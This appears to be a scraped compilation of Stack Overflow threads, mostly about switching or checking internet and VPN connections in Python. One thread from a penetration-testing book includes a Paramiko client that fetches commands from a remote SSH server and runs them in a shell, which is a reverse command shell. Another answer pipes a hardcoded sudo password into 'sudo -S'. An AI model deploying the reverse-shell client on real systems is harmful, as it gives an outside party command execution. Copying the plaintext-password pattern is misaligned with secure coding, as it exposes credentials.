How to switch Internet connections using Python in Ubuntu? - python

I have two internet connections via LAN Cable. I am from India, so they are not reliable. If one internet stops working, I want to automatically switch to another internet connection.
I wrote this script to check, If Internet is working or not:
try:
request = requests.get("http://www.google.co.in", timeout=5)
except (requests.ConnectionError, requests.Timeout) as exception:
try:
request = requests.get("http://www.amazon.com", timeout=5)
except (requests.ConnectionError, requests.Timeout) as exception:
print("Internet not working, switching internet.....")
If there is no ping from google & amazon, I need to switch internet.
My connection name is "Wired connection 1" and "Wired connection 2".
Edit: If someone has a solution in any other language or using software, please let me know.

It is a bit tricky, because there can be different network connection management interfaces on Ubuntu.
One of the most popular is NetworkManager.
If your machine uses it, you can try getting and using NetworkManager python module.
It says that "You can use this interface to query NetworkManager about the overall state of the network and details of network devices like current IP addresses or DHCP options, and to configure, activate and deactivate network connections."
So it should work, provided your Ubuntu uses NetworkManager.
As I have never used it, I can't provide any technical details on how to set up connection switching.
If it turns out that module doesn't work or your Ubuntu doesn't use NetworkManager, you can always switch connections by using shell commands from within Python to change the connection, using whichever commands you would use from shell via os.system() calls or subprocess module.

I figured it out
import requests
import os
import time
sudoPassword = 'pass'
pingFailStreak = 0
url1 = "http://www.google.co.in"
url2 = "http://www.amazon.com"
timeout = 5
def doesInternetWork(url,timeout):
try:
request = requests.get(url, timeout=timeout)
return True
except (requests.ConnectionError, requests.Timeout) as exception:
return False
def connectInternet(netID):
if netID==1:
command = 'nmcli dev disconnect enp6s0'
p = os.system('echo %s|sudo -S %s' % (sudoPassword, command))
command = 'nmcli dev connect enp5s0'
p = os.system('echo %s|sudo -S %s' % (sudoPassword, command))
elif netID==2:
command = 'nmcli dev disconnect enp5s0'
p = os.system('echo %s|sudo -S %s' % (sudoPassword, command))
command = 'nmcli dev connect enp6s0'
p = os.system('echo %s|sudo -S %s' % (sudoPassword, command))
while True:
if doesInternetWork(url1,timeout) == False and doesInternetWork(url2,timeout) == False:
print("Internet not working")
pingFailStreak += 1
if pingFailStreak > 2:
print("Switching intetnet to 1")
connectInternet(1)
time.sleep(5)
if doesInternetWork(url1,timeout) == False and doesInternetWork(url2,timeout) == False:
print("Switching intetnet to 2")
connectInternet(2)
time.sleep(5)
time.sleep(2)

Related

Checking internet connection before polling? (Telegram bot) [duplicate]

I want to see if I can access an online API, but for that, I need to have Internet access.
How can I see if there's a connection available and active using Python?
Perhaps you could use something like this:
import urllib2
def internet_on():
try:
urllib2.urlopen('http://216.58.192.142', timeout=1)
return True
except urllib2.URLError as err:
return False
Currently, 216.58.192.142 is one of the IP addresses for google.com. Change http://216.58.192.142 to whatever site can be expected to respond quickly.
This fixed IP will not map to google.com forever. So this code is
not robust -- it will need constant maintenance to keep it working.
The reason why the code above uses a fixed IP address instead of fully qualified domain name (FQDN) is because a FQDN would require a DNS lookup. When the machine does not have a working internet connection, the DNS lookup itself may block the call to urllib_request.urlopen for more than a second. Thanks to #rzetterberg for pointing this out.
If the fixed IP address above is not working, you can find a current IP address for google.com (on unix) by running
% dig google.com +trace
...
google.com. 300 IN A 216.58.192.142
If we can connect to some Internet server, then we indeed have connectivity. However, for the fastest and most reliable approach, all solutions should comply with the following requirements, at the very least:
Avoid DNS resolution (we will need an IP that is well-known and guaranteed to be available for most of the time)
Avoid application layer connections (connecting to an HTTP/FTP/IMAP service)
Avoid calls to external utilities from Python or other language of choice (we need to come up with a language-agnostic solution that doesn't rely on third-party solutions)
To comply with these, one approach could be to, check if one of the Google's public DNS servers is reachable. The IPv4 addresses for these servers are 8.8.8.8 and 8.8.4.4. We can try connecting to any of them.
A quick Nmap of the host 8.8.8.8 gave below result:
$ sudo nmap 8.8.8.8
Starting Nmap 6.40 ( http://nmap.org ) at 2015-10-14 10:17 IST
Nmap scan report for google-public-dns-a.google.com (8.8.8.8)
Host is up (0.0048s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
53/tcp open domain
Nmap done: 1 IP address (1 host up) scanned in 23.81 seconds
As we can see, 53/tcp is open and non-filtered. If you are a non-root user, remember to use sudo or the -Pn argument for Nmap to send crafted probe packets and determine if a host is up.
Before we try with Python, let's test connectivity using an external tool, Netcat:
$ nc 8.8.8.8 53 -zv
Connection to 8.8.8.8 53 port [tcp/domain] succeeded!
Netcat confirms that we can reach 8.8.8.8 over 53/tcp. Now we can set up a socket connection to 8.8.8.8:53/tcp in Python to check connection:
import socket
def internet(host="8.8.8.8", port=53, timeout=3):
"""
Host: 8.8.8.8 (google-public-dns-a.google.com)
OpenPort: 53/tcp
Service: domain (DNS/TCP)
"""
try:
socket.setdefaulttimeout(timeout)
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((host, port))
return True
except socket.error as ex:
print(ex)
return False
internet()
Another approach could be to send a manually crafted DNS probe to one of these servers and wait for a response. But, I assume, it might prove slower in comparison due to packet drops, DNS resolution failure, etc. Please comment if you think otherwise.
UPDATE #4: This listing of public nameservers is a good reference for IPs to test against.
UPDATE #3: Tested again after the exception handling change:
defos.py
True
00:00:00:00.410
iamaziz.py
True
00:00:00:00.240
ivelin.py
True
00:00:00:00.109
jaredb.py
True
00:00:00:00.520
kevinc.py
True
00:00:00:00.317
unutbu.py
True
00:00:00:00.436
7h3rAm.py
True
00:00:00:00.030
UPDATE #2: I did quick tests to identify the fastest and most generic implementation of all valid answers to this question. Here's the summary:
$ ls *.py | sort -n | xargs -I % sh -c 'echo %; ./timeit.sh %; echo'
defos.py
True
00:00:00:00.487
iamaziz.py
True
00:00:00:00.335
ivelin.py
True
00:00:00:00.105
jaredb.py
True
00:00:00:00.533
kevinc.py
True
00:00:00:00.295
unutbu.py
True
00:00:00:00.546
7h3rAm.py
True
00:00:00:00.032
And once more:
$ ls *.py | sort -n | xargs -I % sh -c 'echo %; ./timeit.sh %; echo'
defos.py
True
00:00:00:00.450
iamaziz.py
True
00:00:00:00.358
ivelin.py
True
00:00:00:00.099
jaredb.py
True
00:00:00:00.585
kevinc.py
True
00:00:00:00.492
unutbu.py
True
00:00:00:00.485
7h3rAm.py
True
00:00:00:00.035
True in the above output signifies that all these implementations from respective authors correctly identify connectivity to the Internet. Time is shown with milliseconds resolution.
UPDATE #1: Thanks to #theamk's comment, timeout is now an argument and initialized to 3s by default.
It will be faster to just make a HEAD request so no HTML will be fetched.
try:
import httplib # python < 3.0
except:
import http.client as httplib
def have_internet() -> bool:
conn = httplib.HTTPSConnection("8.8.8.8", timeout=5)
try:
conn.request("HEAD", "/")
return True
except Exception:
return False
finally:
conn.close()
As an alternative to ubutnu's/Kevin C answers, I use the requests package like this:
import requests
def connected_to_internet(url='http://www.google.com/', timeout=5):
try:
_ = requests.head(url, timeout=timeout)
return True
except requests.ConnectionError:
print("No internet connection available.")
return False
Bonus: this can be extended to this function that pings a website.
def web_site_online(url='http://www.google.com/', timeout=5):
try:
req = requests.head(url, timeout=timeout)
# HTTP errors are not raised by default, this statement does that
req.raise_for_status()
return True
except requests.HTTPError as e:
print("Checking internet connection failed, status code {0}.".format(
e.response.status_code))
except requests.ConnectionError:
print("No internet connection available.")
return False
Just to update what unutbu said for new code in Python 3.2
def check_connectivity(reference):
try:
urllib.request.urlopen(reference, timeout=1)
return True
except urllib.request.URLError:
return False
And, just to note, the input here (reference) is the url that you want to check: I suggest choosing something that connects fast where you live -- i.e. I live in South Korea, so I would probably set reference to http://www.naver.com.
You can just try to download data, and if connection fail you will know that somethings with connection isn't fine.
Basically you can't check if computer is connected to internet. There can be many reasons for failure, like wrong DNS configuration, firewalls, NAT. So even if you make some tests, you can't have guaranteed that you will have connection with your API until you try.
import urllib
def connected(host='http://google.com'):
try:
urllib.urlopen(host)
return True
except:
return False
# test
print( 'connected' if connected() else 'no internet!' )
For python 3, use urllib.request.urlopen(host)
Try the operation you were attempting to do anyway. If it fails python should throw you an exception to let you know.
To try some trivial operation first to detect a connection will be introducing a race condition. What if the internet connection is valid when you test but goes down before you need to do actual work?
Here's my version
import requests
try:
if requests.get('https://google.com').ok:
print("You're Online")
except:
print("You're Offline")
This might not work if the localhost has been changed from 127.0.0.1
Try
import socket
ipaddress=socket.gethostbyname(socket.gethostname())
if ipaddress=="127.0.0.1":
print("You are not connected to the internet!")
else:
print("You are connected to the internet with the IP address of "+ ipaddress )
Unless edited , your computers IP will be 127.0.0.1 when not connected to the internet.
This code basically gets the IP address and then asks if it is the localhost IP address .
Hope that helps
A modern portable solution with requests:
import requests
def internet():
"""Detect an internet connection."""
connection = None
try:
r = requests.get("https://google.com")
r.raise_for_status()
print("Internet connection detected.")
connection = True
except:
print("Internet connection not detected.")
connection = False
finally:
return connection
Or, a version that raises an exception:
import requests
from requests.exceptions import ConnectionError
def internet():
"""Detect an internet connection."""
try:
r = requests.get("https://google.com")
r.raise_for_status()
print("Internet connection detected.")
except ConnectionError as e:
print("Internet connection not detected.")
raise e
Best way to do this is to make it check against an IP address that python always gives if it can't find the website. In this case this is my code:
import socket
print("website connection checker")
while True:
website = input("please input website: ")
print("")
print(socket.gethostbyname(website))
if socket.gethostbyname(website) == "92.242.140.2":
print("Website could be experiencing an issue/Doesn't exist")
else:
socket.gethostbyname(website)
print("Website is operational!")
print("")
my favorite one, when running scripts on a cluster or not
import subprocess
def online(timeout):
try:
return subprocess.run(
['wget', '-q', '--spider', 'google.com'],
timeout=timeout
).returncode == 0
except subprocess.TimeoutExpired:
return False
this runs wget quietly, not downloading anything but checking that the given remote file exists on the web
Taking unutbu's answer as a starting point, and having been burned in the past by a "static" IP address changing, I've made a simple class that checks once using a DNS lookup (i.e., using the URL "https://www.google.com"), and then stores the IP address of the responding server for use on subsequent checks. That way, the IP address is always up to date (assuming the class is re-initialized at least once every few years or so). I also give credit to gawry for this answer, which showed me how to get the server's IP address (after any redirection, etc.). Please disregard the apparent hackiness of this solution, I'm going for a minimal working example here. :)
Here is what I have:
import socket
try:
from urllib2 import urlopen, URLError
from urlparse import urlparse
except ImportError: # Python 3
from urllib.parse import urlparse
from urllib.request import urlopen, URLError
class InternetChecker(object):
conn_url = 'https://www.google.com/'
def __init__(self):
pass
def test_internet(self):
try:
data = urlopen(self.conn_url, timeout=5)
except URLError:
return False
try:
host = data.fp._sock.fp._sock.getpeername()
except AttributeError: # Python 3
host = data.fp.raw._sock.getpeername()
# Ensure conn_url is an IPv4 address otherwise future queries will fail
self.conn_url = 'http://' + (host[0] if len(host) == 2 else
socket.gethostbyname(urlparse(data.geturl()).hostname))
return True
# Usage example
checker = InternetChecker()
checker.test_internet()
Taking Six' answer I think we could simplify somehow, an important issue as newcomers are lost in highly technical matters.
Here what I finally will use to wait for my connection (3G, slow) to be established once a day for my PV monitoring.
Works under Pyth3 with Raspbian 3.4.2
from urllib.request import urlopen
from time import sleep
urltotest=http://www.lsdx.eu # my own web page
nboftrials=0
answer='NO'
while answer=='NO' and nboftrials<10:
try:
urlopen(urltotest)
answer='YES'
except:
essai='NO'
nboftrials+=1
sleep(30)
maximum running: 5 minutes if reached I will try in one hour's time but its another bit of script!
Taking Ivelin's answer and add some extra check as my router delivers its ip address 192.168.0.1 and returns a head if it has no internet connection when querying google.com.
import socket
def haveInternet():
try:
# first check if we get the correct IP-Address or just the router's IP-Address
info = socket.getaddrinfo("www.google.com", None)[0]
ipAddr = info[4][0]
if ipAddr == "192.168.0.1" :
return False
except:
return False
conn = httplib.HTTPConnection("www.google.com", timeout=5)
try:
conn.request("HEAD", "/")
conn.close()
return True
except:
conn.close()
return False
This works for me in Python3.6
import urllib
from urllib.request import urlopen
def is_internet():
"""
Query internet using python
:return:
"""
try:
urlopen('https://www.google.com', timeout=1)
return True
except urllib.error.URLError as Error:
print(Error)
return False
if is_internet():
print("Internet is active")
else:
print("Internet disconnected")
I added a few to Joel's code.
import socket,time
mem1 = 0
while True:
try:
host = socket.gethostbyname("www.google.com") #Change to personal choice of site
s = socket.create_connection((host, 80), 2)
s.close()
mem2 = 1
if (mem2 == mem1):
pass #Add commands to be executed on every check
else:
mem1 = mem2
print ("Internet is working") #Will be executed on state change
except Exception as e:
mem2 = 0
if (mem2 == mem1):
pass
else:
mem1 = mem2
print ("Internet is down")
time.sleep(10) #timeInterval for checking
For my projects I use script modified to ping the google public DNS server 8.8.8.8. Using a timeout of 1 second and core python libraries with no external dependencies:
import struct
import socket
import select
def send_one_ping(to='8.8.8.8'):
ping_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname('icmp'))
checksum = 49410
header = struct.pack('!BBHHH', 8, 0, checksum, 0x123, 1)
data = b'BCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwx'
header = struct.pack(
'!BBHHH', 8, 0, checksum, 0x123, 1
)
packet = header + data
ping_socket.sendto(packet, (to, 1))
inputready, _, _ = select.select([ping_socket], [], [], 1.0)
if inputready == []:
raise Exception('No internet') ## or return False
_, address = ping_socket.recvfrom(2048)
print(address) ## or return True
send_one_ping()
The select timeout value is 1, but can be a floating point number of choice to fail more readily than the 1 second in this example.
Make sure your pip is up to date by running
pip install --upgrade pip
Install the requests package using
pip install requests
import requests
import webbrowser
url = "http://www.youtube.com"
timeout = 6
try:
request = requests.get(url, timeout=timeout)
print("Connected to the Internet")
print("browser is loading url")
webbrowser.open(url)
except (requests.ConnectionError, requests.Timeout) as exception:
print("poor or no internet connection.")
import requests and try this simple python code.
def check_internet():
url = 'http://www.google.com/'
timeout = 5
try:
_ = requests.get(url, timeout=timeout)
return True
except requests.ConnectionError:
return False
I just want to refer to Ivelin's solution, because I can't comment there.
In python 2.7 with an old SSL certificate (in my case, not possible to update, which is another story), there is a possibility of a Certificate Error. In that case, replacing '8.8.8.8' with 'dns.google' or '8888.google' can help.
Hope this will someone helps too.
try:
import httplib # python < 3.0
except:
import http.client as httplib
def have_internet():
conn = httplib.HTTPSConnection("8888.google", timeout=5)
try:
conn.request("HEAD", "/")
return True
except Exception:
return False
finally:
conn.close()

Python Scripts Run but don't do anything

Lately, I've developed an interest in penetration testing. I decided to try and learn how to write some scripts before investing in a full blown course. Currently I'm working my way through the book Black Hat Python book by Justin Seitz.
I'm in the section on SSH using Paramiko and two of the scripts have me stumped. They both run without errors but nothing gets shown on screen. In Windows and Linux the terminal (or DOS prompt) just returns immediately to the prompt. I have gone over the scripts several times and can't find the issue. The code for both scripts is shown in full below.
Script #1 bh_sshserver.py (The purpose of this script is to create an ssh server)
import socket
import paramiko
import threading
import sys
class Server (paramiko.ServerInterface):
def _init_(self):
self.event = threading.Event()
def check_channel_request(self, kind, chanid):
if kind == 'session':
return
paramiko.OPEN_SUCCEEDED
return
paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_auth_password(self, username, password):
if (username == 'root') and (password == '12345'):
return paramiko.AUTH_SUCCESSFUL
return paramiko.AUTH_FAILED
server = sys.argv[1]
ssh_port = sys.argv[2]
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((server, ssh_port))
sock.listen(100)
print '[+] Listening for connection...'
client, addr = sock.accept()
except Exception, e:
print ' [-] Listen Failed: ' + str(e)
sys.exit(1)
print '[+] Got a connection'
try:
bhSession = paramiko.Transport(client)
bhSession.add_server_key(host_key)
server = Server()
try:
bhSession.start_server(server=server)
except paramiko.SSHException, x:
print '[-] SSH Negotiation Failed'
chan = bhSession.accept(20)
print '[+] Authenticated!'
print chan.recv(1024)
chan.send ('Welcome to bh_ssh')
while True:
try:
command= raw_input("Enter command: ").strip('\n')
if command != 'exit':
chan.send(command)
print chan.recv(1024) + '\n'
else:
chan.send('exit')
print 'exiting'
bhSession.close()
raise Exception ('exit')
except KeyboardInterrupt:
bhSession.close()
except Exception, e:
print '[-] Caught exception: ' + str(e)
try:
bhSession.close()
except:
pass
sys.exit(1)
Script #2 bh_sshRcmd.py (The purpose of this script is to create a command receiver for the ssh server to connect to)
import threading
import paramiko
import subprocess
def ssh_command(ip, user, passwd, command):
client = paramiko.SSHClient()
#client.load host keys ('/home/root/.ssh/known_hosts')
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, username=user, password=passwd)
ssh_session = client.get_transport().open_session()
if ssh_session.active:
ssh_session.exec_command(command)
print ssh_session.recv(1024)
# Read the banner
while True:
command = ssh_session.recv(1024)
# Get Command from SSH Server
try:
cmd_output = subprocess.check_output(command, shell=True)
ssh_session.send(cmd_output)
except Exception, e:
ssh_session.send(str(e))
client.close()
return
ssh_command('192.168.1.26', 'Admin', '12345', 'ClientConnected')
Both of these scripts were written in Windows and so do not need the shebang statement (ie #!/usr/bin/python) at the top. I copied them over to a Linux VM and added that statement, plus made them executable using chmod +x. Still, nothing shows on screen when the scripts run. The IP addresses are from a VMware virtual network which has never given me problems before.
It is likely that there is an error connecting to your server. Try adding more print statements to cover the conditionals like so:
import threading
import paramiko
import subprocess
def ssh_command(ip, user, passwd, command):
print 'running ssh_command with ip: {ip} user: {user} passwd: {passwd}, command: {command}'.format(ip=ip,user=user,passwd=passwd,command=command)
client = paramiko.SSHClient()
#client.load host keys ('/home/root/.ssh/known_hosts')
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, username=user, password=passwd)
ssh_session = client.get_transport().open_session()
if ssh_session.active:
print 'ssh_session is active'
ssh_session.exec_command(command)
print ssh_session.recv(1024)
# Read the banner
while True:
print 'recv-ing'
command = ssh_session.recv(1024)
# Get Command from SSH Server
try:
cmd_output = subprocess.check_output(command, shell=True)
ssh_session.send(cmd_output)
except Exception, e:
ssh_session.send(str(e))
client.close()
return
else:
print 'ssh_session is not active'
ssh_command('192.168.1.26', 'Admin', '12345', 'ClientConnected')
As for bh_sshserver.py, if you ran python bh_sshserver.py, nothing would happen. This is because you don't have any statements in the main scope. If you wanted to start the server you could add code to the bottom of the script with no indentation.
You should call your server from the terminal using command-line arguments like this:
python scriptname.py server_adress port
Change indentation on the last line of client script - it should call your function
Server adresses in the terminal and in the client function should be the same
That's pretty much all
I can provide you with these two scripts that are working for me, if you need it.
Thanks to everyone who replied. In the end I found some Paramiko demo files from github that included a sample SSH server. It turns out the script is much more complicated than the author makes it out to be. I was missing a ton of code, which is why the server was not working. As soon as I made my script a rough match to the sample it worked perfectly so did my client.
In case anyone comes across a similar problem, here is the link to the Paramiko demo files:
https://github.com/paramiko/paramiko/tree/master/demos

Continuous check for VPN Connectivity - Python

Is there any efficient way to check and report in a log file or on the console may be... when ever the VPN is disconnected?
import time
print time.asctime( time.localtime(time.time()) )
Can print the time but I do not know what is the code to recursively find whether the VPN is active or not. Pinging it in a while(1) would be a stupid way to check if the connection is active or not. Any way to achieve this?
This solution is system dependent, I do know that it works on Linux because I've done something similar, but not sure about Windows though. I don't know if you want a solution not involving ping, but I think this is a good solution.
import logging, os, time
PING_HOST='10.10.10.10' # some host on the other side of the VPN
while True:
retcode = os.system('ping -c 1 %s' % PING_HOST)
if retcode:
# perform action for lost connection
logging.warn('Lost visibility with %s' % PING_HOST)
time.sleep(10) # sleep 10 seconds
This works because ping returns a return code of 0 for success. All other return codes signify an error.
In case the IP of vpn changes, you can check if a tunnel has been established at all.
import psutil
import logging, os, time
import subprocess
import sys
procname = "yourprocess_name"
while True:
cmdout = subprocess.Popen(["ifconfig | grep tun"],stdout = subprocess.PIPE, shell=True).communicate()[0]
print "cmdout: "+str(cmdout)
time.sleep(2)
#-----
if "tun" in cmdout:
print "seems to be ok"
if not "tun" in cmdout:
# perform action for lost connection
print "killing "+str(procname)
for proc in psutil.process_iter():
# check whether the process name matches
print "Listing procname: "+str(proc.name())
if proc.name() == procname:
proc.kill()
sys.exit()
This method uses the NAME of the HOST "Connection-specific DNS Suffix" associated with your IP (Mostly the corporation's VPN):
import os
import platform
def check_ping():
hostname = "xyz.com" #hostname will be..Name under: "Connection-specific DNS Suffix" when you type "ipconfig" in cmd..
response = os.system("ping " + ("-n 1 " if platform.system().lower()=="windows" else "-c 1 ") + hostname)
# and then check the response...
if response == 0:
pingstatus = "Network Active: Connected"
else:
pingstatus = "Network Error: Not Connected"
return pingstatus
response = check_ping()
print(response)

How can I see if there's an available and active network connection in Python?

I want to see if I can access an online API, but for that, I need to have Internet access.
How can I see if there's a connection available and active using Python?
Perhaps you could use something like this:
import urllib2
def internet_on():
try:
urllib2.urlopen('http://216.58.192.142', timeout=1)
return True
except urllib2.URLError as err:
return False
Currently, 216.58.192.142 is one of the IP addresses for google.com. Change http://216.58.192.142 to whatever site can be expected to respond quickly.
This fixed IP will not map to google.com forever. So this code is
not robust -- it will need constant maintenance to keep it working.
The reason why the code above uses a fixed IP address instead of fully qualified domain name (FQDN) is because a FQDN would require a DNS lookup. When the machine does not have a working internet connection, the DNS lookup itself may block the call to urllib_request.urlopen for more than a second. Thanks to #rzetterberg for pointing this out.
If the fixed IP address above is not working, you can find a current IP address for google.com (on unix) by running
% dig google.com +trace
...
google.com. 300 IN A 216.58.192.142
If we can connect to some Internet server, then we indeed have connectivity. However, for the fastest and most reliable approach, all solutions should comply with the following requirements, at the very least:
Avoid DNS resolution (we will need an IP that is well-known and guaranteed to be available for most of the time)
Avoid application layer connections (connecting to an HTTP/FTP/IMAP service)
Avoid calls to external utilities from Python or other language of choice (we need to come up with a language-agnostic solution that doesn't rely on third-party solutions)
To comply with these, one approach could be to, check if one of the Google's public DNS servers is reachable. The IPv4 addresses for these servers are 8.8.8.8 and 8.8.4.4. We can try connecting to any of them.
A quick Nmap of the host 8.8.8.8 gave below result:
$ sudo nmap 8.8.8.8
Starting Nmap 6.40 ( http://nmap.org ) at 2015-10-14 10:17 IST
Nmap scan report for google-public-dns-a.google.com (8.8.8.8)
Host is up (0.0048s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
53/tcp open domain
Nmap done: 1 IP address (1 host up) scanned in 23.81 seconds
As we can see, 53/tcp is open and non-filtered. If you are a non-root user, remember to use sudo or the -Pn argument for Nmap to send crafted probe packets and determine if a host is up.
Before we try with Python, let's test connectivity using an external tool, Netcat:
$ nc 8.8.8.8 53 -zv
Connection to 8.8.8.8 53 port [tcp/domain] succeeded!
Netcat confirms that we can reach 8.8.8.8 over 53/tcp. Now we can set up a socket connection to 8.8.8.8:53/tcp in Python to check connection:
import socket
def internet(host="8.8.8.8", port=53, timeout=3):
"""
Host: 8.8.8.8 (google-public-dns-a.google.com)
OpenPort: 53/tcp
Service: domain (DNS/TCP)
"""
try:
socket.setdefaulttimeout(timeout)
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((host, port))
return True
except socket.error as ex:
print(ex)
return False
internet()
Another approach could be to send a manually crafted DNS probe to one of these servers and wait for a response. But, I assume, it might prove slower in comparison due to packet drops, DNS resolution failure, etc. Please comment if you think otherwise.
UPDATE #4: This listing of public nameservers is a good reference for IPs to test against.
UPDATE #3: Tested again after the exception handling change:
defos.py
True
00:00:00:00.410
iamaziz.py
True
00:00:00:00.240
ivelin.py
True
00:00:00:00.109
jaredb.py
True
00:00:00:00.520
kevinc.py
True
00:00:00:00.317
unutbu.py
True
00:00:00:00.436
7h3rAm.py
True
00:00:00:00.030
UPDATE #2: I did quick tests to identify the fastest and most generic implementation of all valid answers to this question. Here's the summary:
$ ls *.py | sort -n | xargs -I % sh -c 'echo %; ./timeit.sh %; echo'
defos.py
True
00:00:00:00.487
iamaziz.py
True
00:00:00:00.335
ivelin.py
True
00:00:00:00.105
jaredb.py
True
00:00:00:00.533
kevinc.py
True
00:00:00:00.295
unutbu.py
True
00:00:00:00.546
7h3rAm.py
True
00:00:00:00.032
And once more:
$ ls *.py | sort -n | xargs -I % sh -c 'echo %; ./timeit.sh %; echo'
defos.py
True
00:00:00:00.450
iamaziz.py
True
00:00:00:00.358
ivelin.py
True
00:00:00:00.099
jaredb.py
True
00:00:00:00.585
kevinc.py
True
00:00:00:00.492
unutbu.py
True
00:00:00:00.485
7h3rAm.py
True
00:00:00:00.035
True in the above output signifies that all these implementations from respective authors correctly identify connectivity to the Internet. Time is shown with milliseconds resolution.
UPDATE #1: Thanks to #theamk's comment, timeout is now an argument and initialized to 3s by default.
It will be faster to just make a HEAD request so no HTML will be fetched.
try:
import httplib # python < 3.0
except:
import http.client as httplib
def have_internet() -> bool:
conn = httplib.HTTPSConnection("8.8.8.8", timeout=5)
try:
conn.request("HEAD", "/")
return True
except Exception:
return False
finally:
conn.close()
As an alternative to ubutnu's/Kevin C answers, I use the requests package like this:
import requests
def connected_to_internet(url='http://www.google.com/', timeout=5):
try:
_ = requests.head(url, timeout=timeout)
return True
except requests.ConnectionError:
print("No internet connection available.")
return False
Bonus: this can be extended to this function that pings a website.
def web_site_online(url='http://www.google.com/', timeout=5):
try:
req = requests.head(url, timeout=timeout)
# HTTP errors are not raised by default, this statement does that
req.raise_for_status()
return True
except requests.HTTPError as e:
print("Checking internet connection failed, status code {0}.".format(
e.response.status_code))
except requests.ConnectionError:
print("No internet connection available.")
return False
Just to update what unutbu said for new code in Python 3.2
def check_connectivity(reference):
try:
urllib.request.urlopen(reference, timeout=1)
return True
except urllib.request.URLError:
return False
And, just to note, the input here (reference) is the url that you want to check: I suggest choosing something that connects fast where you live -- i.e. I live in South Korea, so I would probably set reference to http://www.naver.com.
You can just try to download data, and if connection fail you will know that somethings with connection isn't fine.
Basically you can't check if computer is connected to internet. There can be many reasons for failure, like wrong DNS configuration, firewalls, NAT. So even if you make some tests, you can't have guaranteed that you will have connection with your API until you try.
import urllib
def connected(host='http://google.com'):
try:
urllib.urlopen(host)
return True
except:
return False
# test
print( 'connected' if connected() else 'no internet!' )
For python 3, use urllib.request.urlopen(host)
Try the operation you were attempting to do anyway. If it fails python should throw you an exception to let you know.
To try some trivial operation first to detect a connection will be introducing a race condition. What if the internet connection is valid when you test but goes down before you need to do actual work?
Here's my version
import requests
try:
if requests.get('https://google.com').ok:
print("You're Online")
except:
print("You're Offline")
This might not work if the localhost has been changed from 127.0.0.1
Try
import socket
ipaddress=socket.gethostbyname(socket.gethostname())
if ipaddress=="127.0.0.1":
print("You are not connected to the internet!")
else:
print("You are connected to the internet with the IP address of "+ ipaddress )
Unless edited , your computers IP will be 127.0.0.1 when not connected to the internet.
This code basically gets the IP address and then asks if it is the localhost IP address .
Hope that helps
A modern portable solution with requests:
import requests
def internet():
"""Detect an internet connection."""
connection = None
try:
r = requests.get("https://google.com")
r.raise_for_status()
print("Internet connection detected.")
connection = True
except:
print("Internet connection not detected.")
connection = False
finally:
return connection
Or, a version that raises an exception:
import requests
from requests.exceptions import ConnectionError
def internet():
"""Detect an internet connection."""
try:
r = requests.get("https://google.com")
r.raise_for_status()
print("Internet connection detected.")
except ConnectionError as e:
print("Internet connection not detected.")
raise e
Best way to do this is to make it check against an IP address that python always gives if it can't find the website. In this case this is my code:
import socket
print("website connection checker")
while True:
website = input("please input website: ")
print("")
print(socket.gethostbyname(website))
if socket.gethostbyname(website) == "92.242.140.2":
print("Website could be experiencing an issue/Doesn't exist")
else:
socket.gethostbyname(website)
print("Website is operational!")
print("")
my favorite one, when running scripts on a cluster or not
import subprocess
def online(timeout):
try:
return subprocess.run(
['wget', '-q', '--spider', 'google.com'],
timeout=timeout
).returncode == 0
except subprocess.TimeoutExpired:
return False
this runs wget quietly, not downloading anything but checking that the given remote file exists on the web
Taking unutbu's answer as a starting point, and having been burned in the past by a "static" IP address changing, I've made a simple class that checks once using a DNS lookup (i.e., using the URL "https://www.google.com"), and then stores the IP address of the responding server for use on subsequent checks. That way, the IP address is always up to date (assuming the class is re-initialized at least once every few years or so). I also give credit to gawry for this answer, which showed me how to get the server's IP address (after any redirection, etc.). Please disregard the apparent hackiness of this solution, I'm going for a minimal working example here. :)
Here is what I have:
import socket
try:
from urllib2 import urlopen, URLError
from urlparse import urlparse
except ImportError: # Python 3
from urllib.parse import urlparse
from urllib.request import urlopen, URLError
class InternetChecker(object):
conn_url = 'https://www.google.com/'
def __init__(self):
pass
def test_internet(self):
try:
data = urlopen(self.conn_url, timeout=5)
except URLError:
return False
try:
host = data.fp._sock.fp._sock.getpeername()
except AttributeError: # Python 3
host = data.fp.raw._sock.getpeername()
# Ensure conn_url is an IPv4 address otherwise future queries will fail
self.conn_url = 'http://' + (host[0] if len(host) == 2 else
socket.gethostbyname(urlparse(data.geturl()).hostname))
return True
# Usage example
checker = InternetChecker()
checker.test_internet()
Taking Six' answer I think we could simplify somehow, an important issue as newcomers are lost in highly technical matters.
Here what I finally will use to wait for my connection (3G, slow) to be established once a day for my PV monitoring.
Works under Pyth3 with Raspbian 3.4.2
from urllib.request import urlopen
from time import sleep
urltotest=http://www.lsdx.eu # my own web page
nboftrials=0
answer='NO'
while answer=='NO' and nboftrials<10:
try:
urlopen(urltotest)
answer='YES'
except:
essai='NO'
nboftrials+=1
sleep(30)
maximum running: 5 minutes if reached I will try in one hour's time but its another bit of script!
Taking Ivelin's answer and add some extra check as my router delivers its ip address 192.168.0.1 and returns a head if it has no internet connection when querying google.com.
import socket
def haveInternet():
try:
# first check if we get the correct IP-Address or just the router's IP-Address
info = socket.getaddrinfo("www.google.com", None)[0]
ipAddr = info[4][0]
if ipAddr == "192.168.0.1" :
return False
except:
return False
conn = httplib.HTTPConnection("www.google.com", timeout=5)
try:
conn.request("HEAD", "/")
conn.close()
return True
except:
conn.close()
return False
This works for me in Python3.6
import urllib
from urllib.request import urlopen
def is_internet():
"""
Query internet using python
:return:
"""
try:
urlopen('https://www.google.com', timeout=1)
return True
except urllib.error.URLError as Error:
print(Error)
return False
if is_internet():
print("Internet is active")
else:
print("Internet disconnected")
I added a few to Joel's code.
import socket,time
mem1 = 0
while True:
try:
host = socket.gethostbyname("www.google.com") #Change to personal choice of site
s = socket.create_connection((host, 80), 2)
s.close()
mem2 = 1
if (mem2 == mem1):
pass #Add commands to be executed on every check
else:
